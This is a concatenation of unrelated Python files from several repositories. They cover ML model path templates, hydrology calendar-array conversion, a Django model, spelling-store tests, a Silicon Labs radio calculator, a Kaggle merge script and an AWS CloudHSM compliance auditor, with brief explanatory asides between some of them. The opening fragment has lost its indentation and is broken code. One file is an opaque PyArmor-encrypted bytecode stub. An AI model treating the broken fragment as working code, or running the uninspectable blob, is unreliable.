# summary_writer_name = f"{output_dir}/meta_policy_{cfg.skill_subgoal_cfg.subgoal_type}_{cfg.meta_cvae_cfg.kl_coeff}_{cfg.meta_cvae_cfg.latent_dim}_False{spatial_softmax_str}"
return EasyDict({"output_dir": output_dir,
"model_name": model_name,
"summary_writer_name": summary_writer_name})
def cp_meta_path_template(cfg):
folder_path = cfg.folder
modality_str = get_modalities_str(cfg)
output_dir = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/cp_meta_policy_{modality_str}_{cfg.repr.z_dim}/{cfg.agglomoration.footprint}_{cfg.agglomoration.dist}_{cfg.agglomoration.segment_footprint}_K{cfg.skill_training.agglomoration.K}_{cfg.agglomoration.affinity}_{cfg.skill_training.policy_type}_horizon_{cfg.skill_subgoal_cfg.horizon}_dim_{cfg.skill_subgoal_cfg.visual_feature_dimension}"
if cfg.meta.use_spatial_softmax:
spatial_softmax_str = "_spatial_softmax"
else:
spatial_softmax_str = ""
if cfg.meta_cvae_cfg.enable:
model_name = f"{output_dir}/meta_policy_{cfg.skill_subgoal_cfg.subgoal_type}_{cfg.meta_cvae_cfg.kl_coeff}_{cfg.meta_cvae_cfg.latent_dim}_False{spatial_softmax_str}_cvae"
else:
model_name = f"{output_dir}/meta_policy_{cfg.skill_subgoal_cfg.subgoal_type}_{cfg.meta_cvae_cfg.kl_coeff}_{cfg.meta_cvae_cfg.latent_dim}_False{spatial_softmax_str}"
if cfg.meta.random_affine:
model_name += "_data_aug"
summary_writer_name = model_name
model_name += ".pth"
return EasyDict({"output_dir": output_dir,
"model_name": model_name,
"summary_writer_name": summary_writer_name})
def subgoal_embedding_path_template(cfg, modality_str):
folder_path = cfg.folder
subgoal_embedding_file_name = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/{modality_str}_{cfg.repr.z_dim}_{cfg.skill_training.agglomoration.K}_{cfg.skill_training.policy_type}_horizon_{cfg.skill_subgoal_cfg.horizon}_dim_{cfg.skill_subgoal_cfg.visual_feature_dimension}_embedding.hdf5"
return subgoal_embedding_file_name
def singletask_subgoal_embedding_path_template(cfg, modality_str):
folder_path = cfg.folder
if cfg.multitask.training_task_id == -1:
if cfg.skill_cvae_cfg.enable:
subgoal_embedding_file_name = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/{modality_str}_{cfg.repr.z_dim}_{cfg.skill_training.agglomoration.K}_{cfg.skill_training.policy_type}_horizon_{cfg.skill_subgoal_cfg.horizon}_dim_{cfg.skill_subgoal_cfg.visual_feature_dimension}_cvae_{cfg.skill_subgoal_cfg.subgoal_type}_embedding.hdf5"
else:
subgoal_embedding_file_name = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/{modality_str}_{cfg.repr.z_dim}_{cfg.skill_training.agglomoration.K}_{cfg.skill_training.policy_type}_horizon_{cfg.skill_subgoal_cfg.horizon}_dim_{cfg.skill_subgoal_cfg.visual_feature_dimension}_embedding.hdf5"
else:
print("Single task training")
subgoal_embedding_file_name = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/task_{cfg.multitask.training_task_id}_{modality_str}_{cfg.repr.z_dim}_{cfg.skill_training.agglomoration.K}_{cfg.skill_training.policy_type}_horizon_{cfg.skill_subgoal_cfg.horizon}_dim_{cfg.skill_subgoal_cfg.visual_feature_dimension}_embedding.hdf5"
    return subgoal_embedding_file_name

def multitask_meta_path_template(cfg):
    folder_path = cfg.folder
    modality_str = get_modalities_str(cfg)
    if cfg.multitask.training_task_id == -1:
        # Train on individual initial configurations
        if cfg.skill_training.policy_type == "no_subgoal":
            output_dir = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/meta_policy_{modality_str}_{cfg.repr.z_dim}_{cfg.skill_training.policy_type}/{cfg.agglomoration.footprint}_{cfg.agglomoration.dist}_{cfg.agglomoration.segment_footprint}_K{cfg.skill_training.agglomoration.K}_{cfg.agglomoration.affinity}/{cfg.multitask.task_id}"
        else:
            output_dir = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/meta_policy_{modality_str}_{cfg.repr.z_dim}/{cfg.agglomoration.footprint}_{cfg.agglomoration.dist}_{cfg.agglomoration.segment_footprint}_K{cfg.skill_training.agglomoration.K}_{cfg.agglomoration.affinity}_{cfg.skill_training.policy_type}_horizon_{cfg.skill_subgoal_cfg.horizon}_dim_{cfg.skill_subgoal_cfg.visual_feature_dimension}/{cfg.multitask.task_id}"
    else:
        output_dir = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/meta_policy_{modality_str}_{cfg.repr.z_dim}/{cfg.agglomoration.footprint}_{cfg.agglomoration.dist}_{cfg.agglomoration.segment_footprint}_K{cfg.skill_training.agglomoration.K}_{cfg.agglomoration.affinity}_{cfg.skill_training.policy_type}_horizon_{cfg.skill_subgoal_cfg.horizon}_dim_{cfg.skill_subgoal_cfg.visual_feature_dimension}/task_{cfg.multitask.training_task_id}"
    if cfg.meta.use_spatial_softmax:
        spatial_softmax_str = "_spatial_softmax"
    else:
        spatial_softmax_str = ""
    if cfg.meta_cvae_cfg.enable:
        model_name = f"{output_dir}/meta_policy_{cfg.skill_subgoal_cfg.subgoal_type}_{cfg.meta_cvae_cfg.kl_coeff}_{cfg.meta_cvae_cfg.latent_dim}_False{spatial_softmax_str}_cvae"
    else:
        model_name = f"{output_dir}/meta_policy_{cfg.skill_subgoal_cfg.subgoal_type}_{cfg.meta_cvae_cfg.kl_coeff}_{cfg.meta_cvae_cfg.latent_dim}_False{spatial_softmax_str}"
    if cfg.multitask.testing_percentage < 1.0:
        model_name += f"_{cfg.multitask.testing_percentage}"
    if cfg.meta.random_affine:
        model_name += "_data_aug"
    summary_writer_name = model_name
    model_name += ".pth"
    return EasyDict({"output_dir": output_dir,
                     "model_name": model_name,
                     "summary_writer_name": summary_writer_name})

def singletask_multitask_meta_path_template(cfg):
    folder_path = cfg.folder
    modality_str = get_modalities_str(cfg)
    output_dir = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/meta_policy_{modality_str}_{cfg.repr.z_dim}/{cfg.agglomoration.footprint}_{cfg.agglomoration.dist}_{cfg.agglomoration.segment_footprint}_K{cfg.skill_training.agglomoration.K}_{cfg.agglomoration.affinity}_{cfg.skill_training.policy_type}_horizon_{cfg.skill_subgoal_cfg.horizon}_dim_{cfg.skill_subgoal_cfg.visual_feature_dimension}/singletask_{cfg.multitask.training_task_id}"
    if cfg.meta.use_spatial_softmax:
        spatial_softmax_str = "_spatial_softmax"
    else:
        spatial_softmax_str = ""
    if cfg.meta_cvae_cfg.enable:
        model_name = f"{output_dir}/meta_policy_{cfg.skill_subgoal_cfg.subgoal_type}_{cfg.meta_cvae_cfg.kl_coeff}_{cfg.meta_cvae_cfg.latent_dim}_False{spatial_softmax_str}_cvae"
    else:
        model_name = f"{output_dir}/meta_policy_{cfg.skill_subgoal_cfg.subgoal_type}_{cfg.meta_cvae_cfg.kl_coeff}_{cfg.meta_cvae_cfg.latent_dim}_False{spatial_softmax_str}"
    if cfg.multitask.testing_percentage < 1.0:
        model_name += f"_{cfg.multitask.testing_percentage}"
    if cfg.meta.random_affine:
        model_name += "_data_aug"
    summary_writer_name = model_name
    model_name += ".pth"
    return EasyDict({"output_dir": output_dir,
                     "model_name": model_name,
                     "summary_writer_name": summary_writer_name})
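Both templates return an `EasyDict` so callers can read the three path fields as attributes. A minimal dict subclass (a hypothetical stand-in for illustration, not the real `easydict` package) shows the access pattern these return values support:

```python
class EasyDictSketch(dict):
    """Minimal stand-in for EasyDict: dict keys readable as attributes."""
    def __getattr__(self, name):
        try:
            return self[name]
        except KeyError as exc:
            raise AttributeError(name) from exc

paths = EasyDictSketch({"output_dir": "results/demo",
                        "model_name": "results/demo/meta_policy.pth",
                        "summary_writer_name": "results/demo/meta_policy"})
print(paths.model_name)  # results/demo/meta_policy.pth
```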
# gwlfe/DailyArrayConverter.py (repo: rajadain/gwlf-e, license: Apache-2.0)
import random
import numpy as np
import numpy.ma as ma
# from numba import jit
from numpy import array
from numpy import r_
from numpy import ravel
from numpy import where
from numpy import zeros
leap_year = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
True, True, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, True, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, True, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, True, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, True, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False]
non_leap_year = [False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, True, True, True, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, True, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, True, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, True, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, True,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False]
def mask_builder(DaysMonth):
    ones = ravel(np.ones((12, 31))).astype("int")
    slices = []
    for i, month in enumerate(DaysMonth[0]):
        slices.append(slice(31 * i, 31 * i + month))
    ones[r_[tuple(slices)]] = 0
    return ones

def ymd_to_daily(ymd_array, DaysMonth):
    month_maps = [leap_year if x[1] == 29 else non_leap_year for x in DaysMonth]
    mask = ravel(array(month_maps))
    x = ma.array(ymd_array, mask=mask)
    return x[~x.mask]

def daily_to_ymd(daily_array, NYrs, DaysMonth):
    result = zeros((NYrs * 12 * 31,))
    month_maps = [leap_year if x[1] == 29 else non_leap_year for x in DaysMonth]
    mask = ravel(array(month_maps))
    x = ma.array(result, mask=mask)
    x[~x.mask] = daily_array
    return x.reshape((NYrs, 12, 31))

def ymd_to_daily_slow(ymd_array, NYrs, DaysMonth):
    result = []
    for Y in range(NYrs):
        for i in range(12):
            for j in range(DaysMonth[Y][i]):
                result.append(ymd_array[Y][i][j])
    return array(result)

def get_value_for_yesterday(variable, variable_0, Y_in, i_in, j_in, DaysMonth):
    temp = array(variable)
    key = random.randint(100000000000, 999999999999)  # use something that is hopefully unique so we can find it again
    temp[Y_in, i_in, j_in] = key
    temp = ymd_to_daily(temp, DaysMonth)
    today = where(temp == key)[0]
    if (len(today) != 1):
        raise AssertionError("this array has values equal to the key")
    if (today[0] - 1 >= 0):
        return temp[today[0] - 1]
    else:  # at the first index of the array
        return variable_0
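The conversion functions above all rest on the same padding scheme: each year is a 12x31 grid, and `mask_builder` marks the grid slots that are not real calendar days. A quick standalone check (with `mask_builder` copied verbatim so the snippet runs on its own) confirms a non-leap year leaves 372 - 365 = 7 padding slots:

```python
import numpy as np

def mask_builder(DaysMonth):
    # Copied from the module above: 1 marks a padding slot in the
    # 12x31 grid, 0 marks a real calendar day.
    ones = np.ravel(np.ones((12, 31))).astype("int")
    slices = []
    for i, month in enumerate(DaysMonth[0]):
        slices.append(slice(31 * i, 31 * i + month))
    ones[np.r_[tuple(slices)]] = 0
    return ones

days_non_leap = [[31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]]
mask = mask_builder(days_non_leap)
print(len(mask), int(mask.sum()))  # 372 7
```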
# rameniaapp/models/tag.py (repo: awlane/ramenia, license: MIT)
from django.db import models
from .noodle import Noodle
class Tag(models.Model):
    name = models.CharField(max_length=20, unique=True)
    description = models.CharField(max_length=140)
# test/programytest/storage/asserts/store/assert_spelling.py (repo: cdoebler1/AIML2, license: MIT)
import os
import os.path
import unittest
from programy.spelling.norvig import NorvigSpellingChecker
class SpellingStoreAsserts(unittest.TestCase):

    def assert_upload_from_file(self, store, verbose):
        store.empty()
        store.upload_from_file(os.path.dirname(__file__) + os.sep + "data" + os.sep + "spelling" + os.sep + "corpus.txt", verbose=verbose)
        spelling_checker = NorvigSpellingChecker()
        self.assertEqual(0, len(spelling_checker.words))
        self.assertEqual(0, spelling_checker.sum_of_words)
        store.load_spelling(spelling_checker)
        self.assertEqual(9, len(spelling_checker.words))
        self.assertEqual(9, spelling_checker.sum_of_words)
        self.assertEqual("THESE ARE SOME WORDS", spelling_checker.correct("Thise ara sime wards"))

    def assert_upload_from_file_no_corpus(self, store, verbose):
        store.empty()
        spelling_checker = NorvigSpellingChecker()
        store.load_spelling(spelling_checker)
        spelling_checker = NorvigSpellingChecker()
        self.assertEqual(0, len(spelling_checker.words))
        self.assertEqual(0, spelling_checker.sum_of_words)
        store.load_spelling(spelling_checker)
        self.assertEqual(0, len(spelling_checker.words))
        self.assertEqual(0, spelling_checker.sum_of_words)

    def assert_upload_from_file_exception(self, store, verbose):
        store.empty()
        spelling_checker = NorvigSpellingChecker()
        store.load_spelling(spelling_checker)
        store.upload_from_file(os.path.dirname(__file__) + os.sep + "data" + os.sep + "spelling" + os.sep + "corpus.txt", verbose=verbose)
        spelling_checker = NorvigSpellingChecker()
        self.assertEqual(0, len(spelling_checker.words))
        self.assertEqual(0, spelling_checker.sum_of_words)
        store.load_spelling(spelling_checker)
        self.assertEqual(0, len(spelling_checker.words))
        self.assertEqual(0, spelling_checker.sum_of_words)
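The `NorvigSpellingChecker` exercised above takes its name from Norvig's classic corrector, whose core idea is to enumerate every candidate string one edit away and keep those found in the corpus. An illustrative sketch of that candidate generator (an assumption about the approach, not programy's actual implementation):

```python
def edits1(word):
    """All strings one edit (delete, transpose, replace, insert) away
    from `word`; illustrative sketch of the Norvig-style generator."""
    letters = "abcdefghijklmnopqrstuvwxyz"
    splits = [(word[:i], word[i:]) for i in range(len(word) + 1)]
    deletes = [L + R[1:] for L, R in splits if R]
    transposes = [L + R[1] + R[0] + R[2:] for L, R in splits if len(R) > 1]
    replaces = [L + c + R[1:] for L, R in splits if R for c in letters]
    inserts = [L + c + R for L, R in splits for c in letters]
    return set(deletes + transposes + replaces + inserts)

print("these" in edits1("thise"))  # True: replace the 'i' with 'e'
```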
# platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/margay/calculators/calc_global.py (repo: SiliconLabs/gecko_sdk, license: Zlib)
from pyradioconfig.parts.ocelot.calculators.calc_global import CALC_Global_ocelot
class CALC_Global_Margay(CALC_Global_ocelot):
    pass
# Three_Part_Moudule/PyArmor/dist/b.py (repo: QAlexBall/Learning_Py, license: MIT); PyArmor-obfuscated bytecode stub
__pyarmor__(__name__, __file__, b'\x50\x59\x41\x52\x4d\x4f\x52\x00\x00\x03\x07\x00\x42\x0d\x0d\x0a\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00\xaf\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xec\x50\x8c\x64\x26\x42\xd6\x01\x10\x54\xca\x9c\xb6\x36\x84\x05\x6a\x0b\xf3\xc4\x16\x01\xbe\x47\xe4\xba\x27\x21\x43\xd2\xf0\xab\x91\xf2\xe4\x6b\x96\x6d\x38\x10\xbf\xea\xc7\xa7\x5e\x9e\x57\xae\xba\xa8\x32\x3d\x72\x7a\xd9\x99\x27\xfe\x8b\x46\xfd\x72\xea\x9e\x85\xa7\x63\x71\x39\x45\x1b\xac\xe6\xad\xf2\x06\x4e\x71\x90\x1c\x01\xab\x24\x11\x02\xff\x14\xc7\xe8\x97\x34\x85\x07\x67\x55\xd3\xf6\xcf\x62\xcf\x1a\xe5\xf6\x42\x0c\x7a\x61\xa3\x90\xae\xf6\x13\x86\x91\xae\xf4\x4e\xdf\xfa\x72\xe2\x94\x59\x2a\x06\xcf\xa7\x7d\x07\xdc\x6b\xf0\x1d\xc6\x93\xc2\x87\x65\x24\x56\xb7\xb7\x02\x2b\xf9\x74\x4a\x75\x49\x4c\x0c\xbe\x52\x08\x5b\x20\xf5\xca\x56\xe0\x3c\xc2\xd8\xc1\x94\x18\x0a\x5b\xe7\x41\x91\xe6\x3f\x12\x31', 1)
# python/merge_result.py (repo: SantyagoSeaman/Kaggle-The-Allen-AI-Science-Challenge, license: Apache-2.0)
import datetime
import pandas as pd
sample_submission = pd.read_csv('data/sample_submission.csv')
v0 = pd.read_csv('data/impl_3_2016-02-02-09-46-39__3800.csv')
v1 = pd.read_csv('data/impl_3_2016-02-02-12-28-33__4900.csv')
v2 = pd.read_csv('data/impl_3_2016-02-02-23-16-05__7400.csv')
v3 = pd.read_csv('data/impl_3_2016-02-03-01-21-59__8100.csv')
sample_submission[0:3800] = v0[0:3800]
sample_submission[3800:4900] = v1[3800:4900]
sample_submission[4900:7400] = v2[4900:7400]
sample_submission[7400:8100] = v3[7400:8100]
sample_submission.to_csv(
    'data/total_3_' + datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S") + '.csv',
    index=False
)
v0 = pd.read_csv('data/impl_5_2016-02-02-09-46-39__3800.csv')
v1 = pd.read_csv('data/impl_5_2016-02-02-12-28-34__4900.csv')
v2 = pd.read_csv('data/impl_5_2016-02-02-23-16-05__7400.csv')
v3 = pd.read_csv('data/impl_5_2016-02-03-01-21-24__8100.csv')
sample_submission[0:3800] = v0[0:3800]
sample_submission[3800:4900] = v1[3800:4900]
sample_submission[4900:7400] = v2[4900:7400]
sample_submission[7400:8100] = v3[7400:8100]
sample_submission.to_csv(
    'data/total_5_' + datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S") + '.csv',
    index=False
)
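The stitching above works because assigning a row slice of one DataFrame into the same row slice of another aligns on the shared integer index, so each partial submission overwrites only its own range. A tiny illustration of the same splice pattern:

```python
import pandas as pd

base = pd.DataFrame({"correctAnswer": ["A"] * 6})
patch = pd.DataFrame({"correctAnswer": ["B"] * 6})

# Rows 2 and 3 of `patch` overwrite rows 2 and 3 of `base`.
base[2:4] = patch[2:4]
print(list(base["correctAnswer"]))  # ['A', 'A', 'B', 'B', 'A', 'A']
```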
# eeauditor/auditors/aws/AWS_CloudHSM_Auditor.py (repo: kbhagi/ElectricEye, license: Apache-2.0)
#This file is part of ElectricEye.
#SPDX-License-Identifier: Apache-2.0
#Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
#with the License. You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing,
#software distributed under the License is distributed on an
#"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
#KIND, either express or implied. See the License for the
#specific language governing permissions and limitations
#under the License.
import boto3
import datetime
import json
import os
from check_register import CheckRegister
registry = CheckRegister()
cloudhsm = boto3.client("cloudhsmv2")
def describe_clusters(cache):
    response = cache.get("describe_clusters")
    if response:
        return response
    cache["describe_clusters"] = cloudhsm.describe_clusters()
    return cache["describe_clusters"]
@registry.register_check("cloudhsm")
def cloudhsm_cluster_degradation_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
    """[CloudHsm.1] CloudHsm clusters should not be degraded"""
    hsm_clusters = describe_clusters(cache=cache)
    iso8601Time = datetime.datetime.now(datetime.timezone.utc).isoformat()
    for clstr in hsm_clusters["Clusters"]:
        ClusterId = clstr["ClusterId"]
        if clstr["State"] != "DEGRADED":
            # Passing Check
            finding = {
                "SchemaVersion": "2018-10-08",
                "Id": ClusterId + "/cloudhsm-cluster-degradation-check",
                "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
                "GeneratorId": ClusterId,
                "AwsAccountId": awsAccountId,
                "Types": [
                    "Software and Configuration Checks/AWS Security Best Practices",
                ],
                "FirstObservedAt": iso8601Time,
                "CreatedAt": iso8601Time,
                "UpdatedAt": iso8601Time,
                "Severity": {"Label": "INFORMATIONAL"},
                "Confidence": 99,
                "Title": "[CloudHsm.1] CloudHsm clusters should not be in a degraded state",
                "Description": f"CloudHSM cluster {ClusterId} is not in a degraded state",
                "Remediation": {
                    "Recommendation": {
                        "Text": "For more information on HSM Clusters refer to the AWS CloudHsm User Guide on managing cloudhsm clusters",
                        "Url": "https://docs.aws.amazon.com/cloudhsm/latest/userguide/manage-clusters.html",
                    }
                },
                "ProductFields": {"Product Name": "ElectricEye"},
                "Resources": [
                    {
                        "Type": "AwsCloudHsmCluster",
                        "Id": ClusterId,
                        "Partition": awsPartition,
                        "Region": awsRegion,
                        "Details": {"AwsCloudHsmCluster": {"ClusterId": ClusterId}},
                    }
                ],
                "Compliance": {
                    "Status": "PASSED",
                    "RelatedRequirements": [
                        "NIST CSF DE.AE-2",
                        "NIST CSF DE.AE-3",
                        "NIST CSF DE.AE-5",
                        "NIST CSF DE.CM-1",
                        "NIST CSF DE.DP-2",
                        "NIST SP 800-53 AC-2",
                        "NIST SP 800-53 AU-6",
                        "NIST SP 800-53 AU-12",
                        "NIST SP 800-53 IR-5",
                        "NIST SP 800-53 IR-6",
                        "AICPA TSC CC4.1",
                        "AICPA TSC CC5.1",
                        "ISO 27001:2013 A.10.1.2",
                        "ISO 27001:2013 A.12.4.1",
                    ],
                },
                "Workflow": {"Status": "RESOLVED"},
                "RecordState": "ARCHIVED",
            }
            yield finding
        else:
            finding = {
                "SchemaVersion": "2018-10-08",
                "Id": ClusterId + "/cloudhsm-cluster-degradation-check",
                "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
                "GeneratorId": ClusterId,
                "AwsAccountId": awsAccountId,
                "Types": [
                    "Software and Configuration Checks/AWS Security Best Practices",
                ],
                "FirstObservedAt": iso8601Time,
                "CreatedAt": iso8601Time,
                "UpdatedAt": iso8601Time,
                "Severity": {"Label": "HIGH"},
                "Confidence": 99,
                "Title": "[CloudHsm.1] CloudHsm clusters should not be in a degraded state",
                "Description": f"CloudHSM cluster {ClusterId} is in a degraded state",
                "Remediation": {
                    "Recommendation": {
                        "Text": "For more information on HSM Clusters refer to the AWS CloudHsm User Guide on managing cloudhsm clusters",
                        "Url": "https://docs.aws.amazon.com/cloudhsm/latest/userguide/manage-clusters.html",
                    }
                },
                "ProductFields": {"Product Name": "ElectricEye"},
                "Resources": [
                    {
                        "Type": "AwsCloudHsmCluster",
                        "Id": ClusterId,
                        "Partition": awsPartition,
                        "Region": awsRegion,
                        "Details": {"AwsCloudHsmCluster": {"ClusterId": ClusterId}},
                    }
                ],
                "Compliance": {
                    "Status": "FAILED",
                    "RelatedRequirements": [
                        "NIST CSF DE.AE-2",
                        "NIST CSF DE.AE-3",
                        "NIST CSF DE.AE-5",
                        "NIST CSF DE.CM-1",
                        "NIST CSF DE.DP-2",
                        "NIST SP 800-53 AC-2",
                        "NIST SP 800-53 AU-6",
                        "NIST SP 800-53 AU-12",
                        "NIST SP 800-53 IR-5",
                        "NIST SP 800-53 IR-6",
                        "AICPA TSC CC4.1",
                        "AICPA TSC CC5.1",
                        "ISO 27001:2013 A.10.1.2",
                        "ISO 27001:2013 A.12.4.1",
                    ],
                },
                "Workflow": {"Status": "NEW"},
                "RecordState": "ACTIVE",
            }
            yield finding
@registry.register_check("cloudhsm")
def cloudhsm_hsm_degradation_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
    """[CloudHsm.2] CloudHsm HSMs should not be degraded"""
    hsm_clusters = describe_clusters(cache=cache)
    iso8601Time = datetime.datetime.now(datetime.timezone.utc).isoformat()
    for clstr in hsm_clusters["Clusters"]:
        ClusterId = clstr["ClusterId"]
        for hsm in clstr['Hsms']:
            HsmId = hsm['HsmId']
            if hsm["State"] != "DEGRADED":
                # Passing Check
                finding = {
                    "SchemaVersion": "2018-10-08",
                    "Id": HsmId + "/cloudhsm-cluster-degradation-check",
                    "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
                    "GeneratorId": HsmId,
                    "AwsAccountId": awsAccountId,
                    "Types": [
                        "Software and Configuration Checks/AWS Security Best Practices",
                    ],
                    "FirstObservedAt": iso8601Time,
                    "CreatedAt": iso8601Time,
                    "UpdatedAt": iso8601Time,
                    "Severity": {"Label": "INFORMATIONAL"},
                    "Confidence": 99,
                    "Title": "[CloudHsm.2] CloudHsm HSMs should not be in a degraded state",
                    "Description": f"CloudHSM HSM {HsmId} is not in a degraded state",
                    "Remediation": {
                        "Recommendation": {
                            "Text": "For more information on HSM Clusters refer to the AWS CloudHsm User Guide on managing Hsms",
                            "Url": "https://docs.aws.amazon.com/cloudhsm/latest/userguide/introduction.html",
                        }
                    },
                    "ProductFields": {"Product Name": "ElectricEye"},
                    "Resources": [
                        {
                            "Type": "AwsCloudHsmHsm",
                            "Id": HsmId,
                            "Partition": awsPartition,
                            "Region": awsRegion,
                            "Details": {"AwsCloudHsmHsm": {"HsmId": HsmId}},
                        }
                    ],
                    "Compliance": {
                        "Status": "PASSED",
                        "RelatedRequirements": [
                            "NIST CSF DE.AE-2",
                            "NIST CSF DE.AE-3",
                            "NIST CSF DE.AE-5",
                            "NIST CSF DE.CM-1",
                            "NIST CSF DE.DP-2",
                            "NIST SP 800-53 AC-2",
                            "NIST SP 800-53 AU-6",
                            "NIST SP 800-53 AU-12",
                            "NIST SP 800-53 IR-5",
                            "NIST SP 800-53 IR-6",
                            "AICPA TSC CC4.1",
                            "AICPA TSC CC5.1",
                            "ISO 27001:2013 A.10.1.2",
                            "ISO 27001:2013 A.12.4.1",
                        ],
                    },
                    "Workflow": {"Status": "RESOLVED"},
                    "RecordState": "ARCHIVED",
                }
                yield finding
            else:
                finding = {
                    "SchemaVersion": "2018-10-08",
                    "Id": HsmId + "/cloudhsm-cluster-degradation-check",
                    "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
                    "GeneratorId": HsmId,
                    "AwsAccountId": awsAccountId,
                    "Types": [
                        "Software and Configuration Checks/AWS Security Best Practices",
                    ],
                    "FirstObservedAt": iso8601Time,
                    "CreatedAt": iso8601Time,
                    "UpdatedAt": iso8601Time,
                    "Severity": {"Label": "HIGH"},
                    "Confidence": 99,
                    "Title": "[CloudHsm.2] CloudHsm HSMs should not be in a degraded state",
                    "Description": f"CloudHSM HSM {HsmId} is in a degraded state",
                    "Remediation": {
                        "Recommendation": {
                            "Text": "For more information on HSM Clusters refer to the AWS CloudHsm User Guide on managing Hsms",
                            "Url": "https://docs.aws.amazon.com/cloudhsm/latest/userguide/introduction.html",
                        }
                    },
                    "ProductFields": {"Product Name": "ElectricEye"},
                    "Resources": [
                        {
                            "Type": "AwsCloudHsmHsm",
                            "Id": HsmId,
                            "Partition": awsPartition,
                            "Region": awsRegion,
                            "Details": {"AwsCloudHsmHsm": {"HsmId": HsmId}},
                        }
                    ],
                    "Compliance": {
                        "Status": "FAILED",
                        "RelatedRequirements": [
                            "NIST CSF DE.AE-2",
                            "NIST CSF DE.AE-3",
                            "NIST CSF DE.AE-5",
                            "NIST CSF DE.CM-1",
                            "NIST CSF DE.DP-2",
                            "NIST SP 800-53 AC-2",
                            "NIST SP 800-53 AU-6",
                            "NIST SP 800-53 AU-12",
                            "NIST SP 800-53 IR-5",
                            "NIST SP 800-53 IR-6",
                            "AICPA TSC CC4.1",
                            "AICPA TSC CC5.1",
                            "ISO 27001:2013 A.10.1.2",
                            "ISO 27001:2013 A.12.4.1",
                        ],
                    },
                    "Workflow": {"Status": "NEW"},
                    "RecordState": "ACTIVE",
                }
                yield finding
